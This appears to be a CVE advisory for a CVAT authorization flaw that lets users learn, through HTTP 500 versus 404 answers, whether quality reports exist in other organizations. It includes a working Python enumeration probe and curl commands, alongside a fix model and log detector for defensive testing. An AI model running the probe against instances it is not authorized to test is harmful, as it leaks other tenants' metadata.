CVE-2026-58373
Status: Received - Intake

Improper Authorization in CVAT Quality Reports API

Vulnerability report for CVE-2026-58373, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-06-30

Last updated on: 2026-06-30

Assigner: VulnCheck

Description

CVAT before 2.69.0 contains an improper authorization vulnerability in QualityReportViewSet.get_queryset that allows authenticated attackers to enumerate quality report identifiers belonging to other organizations by exploiting a missing check_object_permissions call on the parent_id query parameter of the quality reports API endpoint. Attackers can send requests with sequential integer parent_id values and distinguish between existing and non-existing reports via HTTP 500 versus HTTP 404 response differences, disclosing cross-organization report existence without returning report content.

Meta Information

Published: 2026-06-30
Last Modified: 2026-06-30
Generated: 2026-06-30
EPSS Evaluated: N/A

Affected Vendors & Products

Showing 1 associated CPE

Vendor    Product   Version / Range
cvat-ai   cvat      < 2.69.0 (2.69.0 itself not affected)

Exploitability

CWE ID    Description
CWE-862   Missing Authorization: the product does not perform an authorization check when an actor attempts to access a resource or perform an action.

Executive Summary

CVE-2026-58373 is an improper authorization vulnerability in CVAT versions before 2.69.0. It occurs in the QualityReportViewSet.get_queryset function, where a missing permission check on the parent_id query parameter allows authenticated attackers to enumerate quality report identifiers belonging to other organizations.

Exploitation is a walk over the id space: the attacker requests the quality reports list with sequential integer parent_id values and looks only at the status code. An HTTP 500 means a report with that id exists but belongs to an organization the caller cannot access (the view fetched it, skipped check_object_permissions, and failed later); an HTTP 404 means no such report exists. The report body is never returned, so what leaks is one bit per id: whether a report exists somewhere else on the instance.
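The mechanism described in this summary, and the shape of the fix discussed under Mitigation Strategies, as an added illustration rather than CVAT's own code: a framework-free Python model of a DRF-style list view filtered by parent_id. The vulnerable handler fetches the parent and skips the object-level permission check, so a foreign parent survives until a later step raises and the framework answers 500; the hardened handler checks access to the parent first and answers a foreign parent exactly as it answers a missing one. The report data, the organization slugs, and the specific downstream exception that becomes the 500 are all assumptions; the page only establishes that an existing foreign report yields 500 and a non-existent one yields 404.

```python
"""Model of the CVE-2026-58373 existence oracle (added example; not CVAT code).

Data, names and the exact downstream failure are assumptions. The advisory only
establishes that, on a vulnerable server, a parent_id belonging to another
organization yields HTTP 500 and a non-existent one yields HTTP 404.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class QualityReport:
    id: int
    org: str                         # organization slug that owns the report
    parent_id: Optional[int] = None  # child reports hang off a parent report


@dataclass(frozen=True)
class Request:
    user: str
    org: str                         # organization the caller is acting in
    params: Dict[str, str] = field(default_factory=dict)


class HttpError(Exception):
    """Stand-in for DRF's APIException family: carries the status to return."""
    def __init__(self, status: int) -> None:
        super().__init__(status)
        self.status = status


# Constructed sample data: two tenants, one parent and one child report each.
REPORTS: List[QualityReport] = [
    QualityReport(1, "acme"),
    QualityReport(2, "acme", parent_id=1),
    QualityReport(3, "globex"),
    QualityReport(4, "globex", parent_id=3),
]


def _get_report(report_id: int) -> QualityReport:
    """Unscoped lookup over the whole table, like get_object_or_404."""
    for r in REPORTS:
        if r.id == report_id:
            return r
    raise HttpError(404)


def _can_view(request: Request, report: QualityReport) -> bool:
    """The object-level check the vulnerable path never runs."""
    return report.org == request.org


def vulnerable_list(request: Request) -> Tuple[int, List[int]]:
    visible = [r for r in REPORTS if r.org == request.org]   # org-scoped queryset
    parent_id = request.params.get("parent_id")
    if parent_id is None:
        return 200, [r.id for r in visible]
    parent = _get_report(int(parent_id))                      # 404 if absent
    # MISSING: check_object_permissions(request, parent)
    # Assumed downstream failure: the code re-resolves the parent inside the
    # org-scoped queryset and assumes it is there. For a foreign parent the
    # lookup raises, and the framework turns the unhandled error into a 500.
    scoped_parent = next(r for r in visible if r.id == parent.id)
    return 200, [r.id for r in visible if r.parent_id == scoped_parent.id]


def hardened_list(request: Request) -> Tuple[int, List[int]]:
    visible = [r for r in REPORTS if r.org == request.org]
    parent_id = request.params.get("parent_id")
    if parent_id is None:
        return 200, [r.id for r in visible]
    parent = _get_report(int(parent_id))
    if not _can_view(request, parent):
        # Deliberately the same answer as "does not exist": a foreign id tells
        # the caller nothing that a random id would not.
        raise HttpError(404)
    return 200, [r.id for r in visible if r.parent_id == parent.id]


def dispatch(view, request: Request) -> int:
    """Framework stand-in: map exceptions to status codes the way DRF does."""
    try:
        status, _body = view(request)
        return status
    except HttpError as err:
        return err.status
    except Exception:              # anything unhandled becomes a 500
        return 500


def leaks_existence(view, caller_org: str = "globex",
                    foreign_id: int = 1, missing_id: int = 999) -> bool:
    """True when a foreign parent and a missing parent get different answers."""
    def status(pid: int) -> int:
        return dispatch(view, Request("mallory", caller_org, {"parent_id": str(pid)}))
    return status(foreign_id) != status(missing_id)


if __name__ == "__main__":
    for name, view in (("vulnerable", vulnerable_list), ("hardened", hardened_list)):
        print(name, "leaks existence:", leaks_existence(view))
```

The design point in the hardened path is that "not yours" and "not there" must be indistinguishable to the caller; a 403 for the foreign case would close the 500 but keep the oracle.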

Impact Analysis

An authenticated user can discover which quality-report ids exist in organizations they do not belong to. Because ids are allocated sequentially across the instance, that reveals how many reports other tenants have produced and, if sampled over time, how quickly they are producing them. No report content is exposed.

The leak is reconnaissance material: it confirms that a given tenant is active on a shared instance and hands an attacker a list of valid ids to try against other endpoints or to cite in social engineering. The broader concern for operators of multi-tenant CVAT instances is the pattern it reveals, a missing object-level check on a query parameter, rather than this single endpoint.

Detection Guidance

Active check. Run this only against an instance you are authorized to test. Use an account that is not a member of the organization whose reports you expect to find, and send authenticated requests to /api/quality/reports with integer parent_id values. Calibrate first: the parent_id of a report the account can see should return 200, and an implausibly large value (for example 2147483647) should return 404. Then step through a range of ids and record the status code only.

On a vulnerable server an HTTP 500 means a report with that id exists in an organization the account cannot access, and an HTTP 404 means no such report exists. On a fixed server both cases should produce the same status.

Sample curl commands (CVAT's REST API authenticates with an API token sent as Authorization: Token <key>, or with HTTP basic auth; substitute whatever your deployment accepts):

  • curl -i -H "Authorization: Token <key>" "https://<cvat-server>/api/quality/reports?parent_id=1"
  • curl -i -H "Authorization: Token <key>" "https://<cvat-server>/api/quality/reports?parent_id=2"

If stepping parent_id yields a mix of 500 and 404 answers, the oracle is present. Two caveats: a run of 500s with no 404s is not evidence on its own (the server may simply be failing), and a 403-versus-404 split after an upgrade would still leak existence, just with a different status code.

Passive check. The technique needs many requests with stepped parent_id values and draws mostly 404/500 answers, so it stands out in the access logs of CVAT or the reverse proxy in front of it: flag any single account or client address that requests /api/quality/reports with many distinct parent_id values in a short window, especially consecutive ones, and receives mostly 404/500 responses.
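The active check above as an added example, not tooling from the advisory or from the CVAT project. The probe walks a range of parent_id values through a fetch function that returns only the HTTP status, classifies each answer, and refuses to call the oracle "present" unless both answers it relies on were observed. make_fetch() is the real urllib transport; the authentication header (Authorization: Token <key>) and the endpoint path are taken from the text above, and the calibration ids and the fake servers used to exercise the logic offline are constructed.

```python
"""Active check for the CVE-2026-58373 existence oracle.

Added example, not CVAT code. probe_parent_ids() walks a range of parent_id
values through a fetch(parent_id) -> HTTP status function and classifies each
answer. make_fetch() is the real transport (urllib, token auth); the logic is
exercised offline with constructed fake servers. Assumption: the deployment
accepts 'Authorization: Token <key>'; adjust if it authenticates differently.
"""
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from typing import Callable, Dict, Iterable, List

ENDPOINT = "/api/quality/reports"
Fetch = Callable[[int], int]


def make_fetch(base_url: str, token: str, timeout: float = 10.0) -> Fetch:
    """Return a function that GETs the endpoint for one parent_id and yields the status."""
    def fetch(parent_id: int) -> int:
        query = urllib.parse.urlencode({"parent_id": parent_id})
        url = f"{base_url.rstrip('/')}{ENDPOINT}?{query}"
        req = urllib.request.Request(url, headers={"Authorization": f"Token {token}"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code            # 404 / 500 / 403 all land here
    return fetch


def calibrate(fetch: Fetch, own_parent_id: int, missing_id: int = 2147483647) -> bool:
    """Sanity-check account and transport before drawing conclusions: a parent
    the caller can see must give 200 and an absurd id must give 404."""
    return fetch(own_parent_id) == 200 and fetch(missing_id) == 404


def classify(status: int) -> str:
    if status == 200:
        return "visible"       # parent is in the caller's own organization
    if status == 404:
        return "absent"        # no report with this id (on a vulnerable server)
    if status == 500:
        return "foreign"       # exists, but outside the caller's org: the leak
    if status in (401, 403):
        return "denied"
    return "other"


def probe_parent_ids(fetch: Fetch, ids: Iterable[int]) -> Dict[int, str]:
    return {pid: classify(fetch(pid)) for pid in ids}


def leaked_ids(results: Dict[int, str]) -> List[int]:
    return sorted(pid for pid, kind in results.items() if kind == "foreign")


def oracle_present(results: Dict[int, str], strict: bool = True) -> bool:
    """The oracle is demonstrated only when the server gave BOTH answers it
    relies on; a run of 500s with no 404s may be an unrelated fault. With
    strict=False a 403/404 split counts too, since it leaks the same bit."""
    kinds = set(results.values())
    if "absent" not in kinds:
        return False
    return "foreign" in kinds if strict else bool(kinds & {"foreign", "denied"})


def summarize(results: Dict[int, str]) -> Dict[str, int]:
    return dict(Counter(results.values()))


if __name__ == "__main__":
    import sys
    # usage: probe.py <base_url> <api_token> <parent_id_you_can_see>
    base, token, own = sys.argv[1], sys.argv[2], int(sys.argv[3])
    fetch = make_fetch(base, token)
    if not calibrate(fetch, own):
        sys.exit("calibration failed: check credentials and the known-good parent_id")
    results = probe_parent_ids(fetch, range(1, 201))
    print(summarize(results), "oracle:", oracle_present(results), "leaked:", leaked_ids(results))
```

Keep the id range small and the pace slow on a shared instance; the point is to confirm the status split, not to map every tenant.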

Mitigation Strategies

Upgrade CVAT to 2.69.0 or later, where the vulnerability is fixed.

The fix adds the missing permission check on the report referenced by parent_id in the /api/quality/reports endpoint, so a caller can no longer learn anything about a report outside their organization by naming its id. When validating the upgrade, confirm that a foreign parent_id and a non-existent one now produce the same response; any remaining status-code difference is still an existence oracle.

Until the upgrade can be applied: limit who can reach the endpoint (network allow-listing or a reverse-proxy rule on /api/quality/reports), rate-limit it per user, and alert on bursts of requests that step through parent_id values and draw mostly 404/500 responses. Report content was never exposed, so the interim exposure is the metadata leak, not the reports themselves.
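The monitoring suggested above, as an added example that is not part of the advisory or of CVAT: a detector that reads nginx "combined"-format access lines from a reverse proxy in front of CVAT, groups requests to /api/quality/reports by client address, and flags a client that touches many distinct parent_id values in a short window while collecting mostly 404/500 answers. The log format, the thresholds and the log lines themselves are assumptions; the lines are constructed to show one enumerating client next to a legitimate one.

```python
"""Passive detection of parent_id enumeration against /api/quality/reports.

Added example, not CVAT code. Assumptions: nginx 'combined'-format access logs
from a proxy in front of CVAT, and that a client is suspicious when it requests
at least MIN_IDS distinct parent_id values inside WINDOW seconds and at least
MIN_ERROR_SHARE of those answers are 404 or 500. The log lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
TARGET_PATH = "/api/quality/reports"
MIN_IDS = 5              # distinct parent_id values before a client is flagged
WINDOW = 60.0            # seconds
MIN_ERROR_SHARE = 0.8    # share of 404/500 answers inside the window

SAMPLE_LOG = [  # constructed: one enumerating client, one legitimate client
    '10.0.0.5 - - [30/Jun/2026:10:00:01 +0000] "GET /api/quality/reports?parent_id=1 HTTP/1.1" 500 87 "-" "python-requests/2.31"',
    '10.0.0.5 - - [30/Jun/2026:10:00:02 +0000] "GET /api/quality/reports?parent_id=2 HTTP/1.1" 404 52 "-" "python-requests/2.31"',
    '10.0.0.5 - - [30/Jun/2026:10:00:03 +0000] "GET /api/quality/reports?parent_id=3 HTTP/1.1" 500 87 "-" "python-requests/2.31"',
    '10.0.0.5 - - [30/Jun/2026:10:00:04 +0000] "GET /api/quality/reports?parent_id=4 HTTP/1.1" 500 87 "-" "python-requests/2.31"',
    '10.0.0.5 - - [30/Jun/2026:10:00:05 +0000] "GET /api/quality/reports?parent_id=5 HTTP/1.1" 404 52 "-" "python-requests/2.31"',
    '10.0.0.5 - - [30/Jun/2026:10:00:06 +0000] "GET /api/quality/reports?parent_id=6 HTTP/1.1" 404 52 "-" "python-requests/2.31"',
    '10.0.0.5 - - [30/Jun/2026:10:00:07 +0000] "GET /api/quality/reports?parent_id=7 HTTP/1.1" 500 87 "-" "python-requests/2.31"',
    '10.0.0.5 - - [30/Jun/2026:10:00:08 +0000] "GET /api/quality/reports?parent_id=8 HTTP/1.1" 404 52 "-" "python-requests/2.31"',
    '10.0.0.9 - - [30/Jun/2026:10:00:03 +0000] "GET /api/quality/reports?parent_id=12&page_size=10 HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [30/Jun/2026:10:00:40 +0000] "GET /api/quality/reports?parent_id=12&page_size=10 HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [30/Jun/2026:10:00:41 +0000] "GET /api/tasks?page=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def parse_line(line: str) -> Optional[Dict]:
    """Return an event for a quality-reports request carrying parent_id, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if parts.path != TARGET_PATH:
        return None
    pid = parse_qs(parts.query).get("parent_id", [""])[0]
    if not pid.isdigit():
        return None
    return {"client": m["ip"], "parent_id": int(pid), "status": int(m["status"]),
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")}


def longest_consecutive_run(ids: List[int]) -> int:
    """Length of the longest run of consecutive ids: the fingerprint of a sequential walk."""
    s = sorted(set(ids))
    best = run = 1 if s else 0
    for prev, cur in zip(s, s[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best


def find_enumeration(lines: List[str]) -> List[Dict]:
    per_client: Dict[str, List[Dict]] = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev is not None:
            per_client[ev["client"]].append(ev)
    alerts = []
    for client, evs in per_client.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = None, 0
        for end in range(len(evs)):
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > WINDOW:
                start += 1                      # slide the window's left edge
            window = evs[start:end + 1]
            ids = [e["parent_id"] for e in window]
            errors = [e["status"] for e in window if e["status"] in (404, 500)]
            if len(set(ids)) < MIN_IDS or len(errors) / len(window) < MIN_ERROR_SHARE:
                continue
            cand = {"client": client, "distinct_ids": len(set(ids)),
                    "longest_run": longest_consecutive_run(ids),
                    "n_500": errors.count(500), "n_404": errors.count(404),
                    "first": window[0]["ts"].isoformat(), "last": window[-1]["ts"].isoformat()}
            if best is None or cand["distinct_ids"] > best["distinct_ids"]:
                best = cand                     # keep the fullest window per client
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in find_enumeration(SAMPLE_LOG):
        print(alert)
```

Keying on the client address is the weakest part: if the proxy logs the authenticated user or CVAT's own request log is available, group on the account instead, since an enumerator can spread requests over addresses but not over tokens it does not hold.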
